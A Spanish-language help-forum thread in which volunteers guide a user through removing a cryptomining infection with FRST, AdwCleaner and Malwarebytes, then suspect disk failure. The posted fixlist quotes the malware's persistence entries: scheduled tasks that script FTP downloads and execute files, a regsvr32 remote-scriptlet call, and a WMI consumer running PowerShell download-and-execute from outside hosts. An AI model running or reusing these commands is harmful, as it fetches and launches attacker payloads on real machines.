Error desconocido al instala MalwareBytes

Buenos días, he intentado seguir varios temas que he visto en el foro, pero no he conseguido nada.

Os comento la situación, cuando intento instalar el MalwareBytes da un error desconocido e impide que la instalación finalice, por tanto y para descartar que fuese problemas de alguna instalación anterior ejecuté en modo seguro la herramienta mbam-clean.exe, y después traté de volverlo a instalar, pero sigo en las mismas.

Desde hace unos días, el pc se congela, cada vez con más frecuencia, por intervalos cortos, pero durante los cuales no responde, tras dejarlo un par de minutos, vuelve a recuperarse.

Con AdwCleaner me saca 4 elementos (PUP.Optional.BitCoinMiner): Se desglosan en 3 claves de registro y una tarea programada (no puedo adjuntar imagen)

Tras ejecutar el Farbar, me saca los siguientes resultados: FRST.txt (68,2 KB) Addition.txt (48,6 KB)

Tengo la sensación de que está bastante infectado. ¿Podrían echarme una mano?

Mil gracias. Saludos.

subo el resultado de AdwCleaner a una imagen en imgur

He tratado de corregir esto. Dandole a cuarentena, los pasa ahí, reinicia y aparentemente los elimina, pero al hacer un nuevo escaneo vuelven a aparecer con otras claves de registro distinta.

Mete miedo tu pc, :cold_sweat:,amen de que tus programas, como Ccleaner, Navegadores, Winrar etc, Skype,estan todos desactualizados, lo que es peligroso desde la seguridad…

Lo primero, Corta y Pega Frst.exe en el escritorio

Bien… y ahora sigue estos pasos, MUY Importante ~ Realiza una copia de seguridad del registro :

  • Para hacerlo descarga Delfix en tu escritorio.

  • Doble clic para ejecutarlo.(Si usas Windows Vista/7/8 o 10 presiona clic derecho y selecciona "Ejecutar como Administrador.")

  • Atención, ahora marca/selecciona únicamente las casillas Registry Backup, las demás NO

  • Pulsar en Run.

Se abrirá el informe (Delfix.txt), guárdalo por si fuera necesario y cierra la herramienta.


En el equipo con los demas programas cerrados:

Inicio >>> Ejecutar >>>Escribes notepad.exe.

Ahora copia y pega estos archivos dentro del Notepad:


Start
CreateRestorePoint:
CloseProcesses:

HKLM-x32\...\Run: [win_en_77] => [X]
HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.ftp1202.site:280/v.sct scrobj.dll <==== ATENCIÓN
HKU\S-1-5-21-3987761340-688897333-2164730740-1001\...\MountPoints2: {c22f5e7f-c8b7-11e4-97b8-d050990cc891} - E:\HTC_Sync_Manager_PC.exe
HKU\S-1-5-21-3987761340-688897333-2164730740-1001\...\MountPoints2: {c3a4be83-c8a2-11e4-9624-d050990cc891} - E:\HTC_Sync_Manager_PC.exe
FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restricción <==== ATENCIÓN
CHR HKLM\SOFTWARE\Policies\Google: Restricción <==== ATENCIÓN
Task: {2D6A1470-CFFF-4CE4-9A72-B326F2C3379C} - System32\Tasks\Yandere Simulator => C:\Users\Sergio\AppData\Local\Temp\is-FCU7B.tmp\prsetup.exe <==== ATENCIÓN
Task: {3C3D898D-DFC3-43B5-B23C-48BF210DBB8C} - System32\Tasks\Mysa2 => cmd /c echo open ftp.ftp1202.site>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATENCIÓN
Task: {45616622-DBF1-4D54-808E-75A661575493} - System32\Tasks\Mysa => cmd /c echo open ftp.ftp1202.site>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATENCIÓN
Task: {F6711BC9-3704-4C43-AD07-D55BB3145703} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa <==== ATENCIÓN
Task: {5E3FE145-33FF-4C4B-A958-22A971A17DCD} - System32\Tasks\oka => cmd /c start c:\windows\inf\aspnet\lsma12.exe
Task: {83E094F4-AB0D-4F4B-80DF-B9ADE94CFCEF} - System32\Tasks\Mysa3 => cmd /c echo open ftp.ftp1202.site>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATENCIÓN
c:\windows\help\lsmosee.exe 
c:\windows\debug\item.dat
C:\Users\Sergio\AppData\Local\Temp\is-FCU7B.tmp
c:\windows\update.exe
Task: {D9D8BBBA-2CFF-4AFE-9023-BE619C9C8EF6} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATENCIÓN
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{aa65884d-86c8-478b-917a-6fb4b99fadba} <==== ATENCIÓN (Restricción - IP)
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617910&ResetID=131074930739632137&GUID=00000000-0000-0000-0000-000000000000
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617910&ResetID=131074930739632137&GUID=00000000-0000-0000-0000-000000000000
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
CHR HKU\S-1-5-21-3987761340-688897333-2164730740-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [apdfllckaahabafndbhieahigkjlhalf] - C:\Users\Sergio\AppData\Local\Google\Drive\apdfllckaahabafndbhieahigkjlhalf_live.crx <no encontrado>
CHR HKLM\...\Chrome\Extension: [kaebhgioafceeldhgjmendlfhbfjefmo] - C:\Program Files (x86)\EagleGet\addon\[email protected] <no encontrado>
C:\Program Files (x86)\EagleGet
CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck]
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki]
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl]
S2 AODDriver4.2.0; \??\C:\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\AODDriver2.sys [X]
S2 AODDriver4.3; \??\C:\Program Files\AMD\ATI.ACE\Fuel\amd64\AODDriver2.sys [X]
S2 AODDriver4.3.0; \??\C:\Program Files\AMD\Performance Profile Client\amd64\AODDriver2.sys [X]
S3 DxkgFilter; \??\C:\Program Files (x86)\iDisplay\idisplay.sys [X]
S3 netr28ux; system32\DRIVERS\netr28ux.sys [X]
S4 nvlddmkm; system32\DRIVERS\nvlddmkm.sys [X]
S4 nvvad_WaveExtensible; system32\drivers\nvvad64v.sys [X]
S3 WinRing0_1_2_0; \??\C:\Users\Sergio\AppData\Local\Temp\Rar$EXa0.029\OpenHardwareMonitor\OpenHardwareMonitorLib.sys [X] <==== ATENCIÓN
2020-04-20 10:49 - 2020-04-20 10:52 - 000003184 _____ C:\Windows\system32\Tasks\ok
2020-04-20 10:48 - 2020-04-20 10:48 - 000000000 _____ C:\Windows\system32\Tmp6B7E.tmp
2020-04-20 10:48 - 2020-04-20 10:48 - 000000000 _____ C:\Windows\system32\Tmp6B6E.tmp
2020-04-20 10:32 - 2020-04-20 10:52 - 000003168 _____ C:\Windows\system32\Tasks\oka
2020-04-20 10:29 - 2020-04-20 10:52 - 000003518 _____ C:\Windows\system32\Tasks\Mysa
2020-04-20 10:29 - 2020-04-20 10:52 - 000003504 _____ C:\Windows\system32\Tasks\Mysa3
2020-04-20 10:29 - 2020-04-20 10:52 - 000003424 _____ C:\Windows\system32\Tasks\Mysa2
2020-04-20 10:29 - 2020-04-20 10:52 - 000003188 _____ C:\Windows\system32\Tasks\Mysa1
2017-10-31 20:25 - 2017-10-31 20:25 - 000000171 _____ () C:\Users\Sergio\AppData\Roaming\1eb766f2-fed1-4d33-9c39-2c8a972fd11f
2017-10-31 20:25 - 2017-10-31 20:25 - 000000163 _____ () C:\Users\Sergio\AppData\Roaming\4e93aa11-2d46-4980-a421-0a4ac759e5bf
2017-10-31 20:25 - 2017-10-31 20:25 - 000000175 _____ () C:\Users\Sergio\AppData\Roaming\fc19ece2-6b3f-4f22-8758-9651ab9ca388
2017-07-13 00:43 - 2017-07-13 00:43 - 000937776 _____ (AutoIt Team) C:\Users\Sergio\AppData\Roaming\FgYF.exe
HKU\S-1-5-21-3987761340-688897333-2164730740-1001\...\ChromeHTML: ->  <==== ATENCIÓN
CustomCLSID: HKU\S-1-5-21-3987761340-688897333-2164730740-1001_Classes\CLSID\{5EF1F961-65E9-BB24-55DB-24F79E56013A}\InprocServer32 -> no ruta de acceso de archivo
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> Ningún archivo
ContextMenuHandlers1: [PDFCreator.ShellContextMenu] -> {d9cea52e-100d-4159-89ea-76e845bc13e1} =>  -> Ningún archivo
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"fuckamm4\"",Filter="__EventFilter.Name=\"fuckamm3\":: <==== ATENCIÓN
WMI:subscription\__TimerInstruction->fuckyoumm2_itimer:: <==== ATENCIÓN
WMI:subscription\__IntervalTimerInstruction->fuckyoumm2_itimer:: <==== ATENCIÓN
WMI:subscription\__EventFilter->fuckamm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'] <==== ATENCIÓN
WMI:subscription\CommandLineEventConsumer->fuckamm4::[CommandLineTemplate => cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1103bye.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http: (la entrada de datos tiene 797 más caracteres).] <==== ATENCIÓN
ShortcutWithArgument: C:\Users\Sergio\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplicaciones de Chrome\Escritorio Remoto de Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) ->  
ShortcutWithArgument: C:\Users\Sergio\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\5d696d521de238c3\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> --profile-directory=Default
AlternateDataStreams: C:\Windows:nlsPreferences [0]
AlternateDataStreams: C:\ProgramData\Nalpeiron:user.ns1 [5]
AlternateDataStreams: C:\ProgramData\Nalpeiron:user.ns2 [5]
AlternateDataStreams: C:\ProgramData\Nalpeiron:user.ns3 [4]
AlternateDataStreams: C:\ProgramData\Nalpeiron:user.ns4 [5]
AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxlctlfudivq`qsp`20hfm [0]
MSCONFIG\startupreg: d7c24012 => C:\ProgramData\Intel\Wireless\34607c3\hbchgha.exe C:\ProgramData\Intel\Wireless\34607c3\177d256.au3
C:\ProgramData\Intel\Wireless
MSCONFIG\startupreg: start => regsvr32 /u /s /i:http://js.0603bye.info:280/v.sct scrobj.dll
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe Ningún archivo
FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe Ningún archivo


HOSTS:
REMOVEPROXY:
EMPTYTEMP:
CMD: netsh winsock reset
CMD: ipconfig /renew
CMD: ipconfig /flushdns
CMD: bitsadmin /reset /allusers
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: netsh int ipv4 reset
CMD: netsh int ipv6 reset
END

Lo guardas bajo el nombre de fixlist.txt en el escritorio <<< Esto es muy importante.<<

Nota: Es importante que la Hta Frst.exe y fixlist.txt se encuentren en la misma ubicación (escritorio) o si no no trabajara.

  • Ejecutas Frst.exe.

  • Presionas el botón Corregir y aguardas a que termine.

  • La Herramienta guardara el reporte en tu escritorio (Fixlog.txt).

Lo pegas en tu próxima respuesta, y luego realzias y me pones todos los logs:

1) Descarga, instala y ejecuta Malwarebytes’ Anti-Malware.

  • Presiona clic en “Use Malewarebytes Free” (Usar Malewarebyte gratis).

  • Pulsa en el botón “Open Malewarebytes Free”.

imagen

  • Presiona el botón “Scan” (Escaneo).

imagen

Una vez finalizado el escaneo aparecerá la siguiente pantalla:

imagen

  • Pulsa en “View report” (Ver informe).

  • Luego presionar el botón “Export” (Exportar). Elijes “Text file” (fichero de texto). Elijes un nombre y guardas ese archivo en el escritorio…

2) Descarga Adwcleaner en el escritorio.

  • Desactiva tu antivirus :arrow_forward:Como deshabilitar temporalmente un antivirus y cualquier programa de seguridad.

  • Ejecuta Adwcleaner.exe (Si usas Windows Vista/7 u 8 presiona clic derecho y selecciona "Ejecutar como Administrador.")

  • Pulsar en el botón Analizar Ahora, y espera a que se realice el proceso, inmediatamente pulsa sobre el botón Iniciar Reparacion.

  • Espera a que se complete y sigue las instrucciones, si te pidiera Reiniciar el sistema Aceptas.

  • Si no encuentra nada, pulsamos “Omitir Reparación

  • El log lo encontramos en la pestaña “Informes”, volviendo a abrir el programa, si es necesario o en"C:\AdwCleaner\Logs\AdwCleaner[C0].txt"

Puedes mirar su manual >> Manual de Adwcleaner

3) Descarga Ccleaner

Instalalo y ejecútalo. En la pestaña limpiador dejas como esta configurada predeterminadamente, haces clic en analizar esperas que termine > clic en ejecutar limpiador. Clic en la pestaña Registro > clic en buscar problemas esperas que termine > clic en Reparar Seleccionadas y haces una copia de seguridad.

Pega los reportes de Malwarebytes, AdwCleaner y comentas como va el problema.


Buenas Miguel,

Antes de nada agradecer tu ayuda, te comento como va el tema.

Tras ejecutar Delfix me genró el siguiente txt: DelFix.txt (261 Bytes)

Tras ejecutar el Frst y darle a corregir me ha generado el siguente fichero (Fixlog.txt): Fixlog.txt (22,9 KB) Tras esto, se ha reiniciado el pc automáticamente.

He tratado de instalar el Malwarebytes descargado desde el enlace que me proporcionas, pero al igual que en el mensaje inicial, da error durante la instalación y no llega a instalarse: Imgur

He descargado y ejecutado el AdwCleaner, con el siguiente resultado: AdwCleaner[C08].txt (2,9 KB)

Por ultimo he instalado y ejecutado el Ccleaner, en la aprte de analisis me indica que ha reparado algunos problemas, aunque no veo log alguno, luego en la de registro lo he ejecutado dos veces, la primera, cuando estaba arrglando lo que había encontrado se ha apagado el pc de manera súbita, y ha hecho un chkdsk automático, a la segunda si ha funcionado, igualmente, no encuentro reporte de esto.

Saludos.

https://downloads.malwarebytes.com/file/mbst?scr=Forums-Home-Support

Descarga ebn el escritorio esta herramienta…boton derecho -ejecutar como administrador

Pestaña Advanced - y elijes “clean”…sigues las indicaciones y cuando te pregunte.,dale a reinstalar Malwarebtrtes ( es posible que te pida reiniciar antes y luego siga con el proceso al reinciar)

Comentas

Tras hacer lo que indica, no me pide reiniciar, y vuelve a dar el mismo error que reporté en el mensaje previo.

Ejecutalo y pegame los logs

Buenas tardes, ha tardado bastante en ejecutarse, pero ha finalizado, adjunto reporte: mbar-log-2020-04-20 (15-57-27).txt (7,7 KB)

He observado que tras este reinicio ha aparecido en la barra de tareas Skype y AVG, que no aparecían por ahi desde hace años., De hecho pensaba que AVG no lo tenía instalado.

Vuelve a ejecutar la herramienta de malwarebytes que te deje y comentas

MAlwarebytes support tool? o antirootkit?

Si… disculpa… esa

Tras limpiar ha reiniciado el pc, y tras el reinicio vuelve a dar el mismo error en el mismo punto al tratar de reinstalar, sobre el 70%

Me pones log

Buenos días Miguel, Disculpa la tardanza, me está siendo imposible generarte el log, es la tercera vez que trato de pasar el ESET, y las 3 veces se ha reiniciado el pc de manera súbita al llegar sobre el 25% del análisis.

Al no finalizar no puedo generar el log.

Por otro lado, la primera vez que se ejecutó llevaba encontrados 14 virus, malware o lo que sea, había 14 warnings, en las dos sucesivas no encuentra nada, por lo que no entiendo si ha podido llegar a eliminara algo con la primera o que.

Voy a intentar pasarlo una cuarta vez, pero se me acaban la ideas de como hacerlo y que no se reinicie… No sé si haciendolo por tandas, y no al equipo al completo de una vez también podría valer.

Por otro lado tras el reinicio del 3er scan, he visto que se ha abierto una ventana de cmd, y se ha ejecutado solo algo “u.exe” no me ha dado tiempo a tomar captura antes de que se cerrase.

Como te comenté, me ha aparecido el AVG, y está en ejecución, no sé si eso puede estar afectando al resto de herramientas que estamos lanzando, si quieres lo desinstalo antes de seguir, o al menos trato de hacerlo.

Intenta usar Eset en Modo seguro con red

Usa el metodo 1, desde configuracion

Buenas, ha llegado algo más lejos, pero ha vuelto a reiniciarse solo. No sé si puede estar provocado por malware, pero imagino que estará causando errores en el disco. Ahora mismo está pasando un CHKDSK. Hasta el momento, como un 35% llevaba 3 warnings.

Saludos.

Hola y con permiso. :+1:

@Sergio_Puertas_Felic la pantalla del proceso que esta haciendo el CHKDSK es similar a esta :

Y figura que el proceso se produce con cinco etapas "(etapa 1 de 5) o el total es de tres etapas (etapa 1 de 3)…??

Saludos.

Pues no me he fijado, la verdad, pero juraría que de 5… De todos modos, me ha generado el .dmp y yo tengo un programa llamado BlueScreenView que interpreta los dumps generados, en el de ahora me indica “KERNEL_DATA_INPAGE_ERROR” Caused by Driver CLFS.SYS, pero los 4 anteriores han sido por orden de ahora hacia atrás: ntoskrnl.exe ntoskrnl.exe NTFS.SYS MSFS.SYS

Acaba de reiniciarse de nuevo, me he fijado ahora, son 3 etapas.

Hola.

En que momento te genero ese archivo del DMP del BlueScreen de Windows del error del CLFS.SYS. :roll_eyes:

Los problemas que estas teniendo con la instalación de Malwarebytes y/o con la ejecución de las distintas herramientas que están fallando, vienen provocados por problemas con tu disco duro.

Habrá que hacer una comprobación exhaustiva del disco duro. :face_with_monocle:

Pero primero comentame lo del fichero DMP…??

Saludos.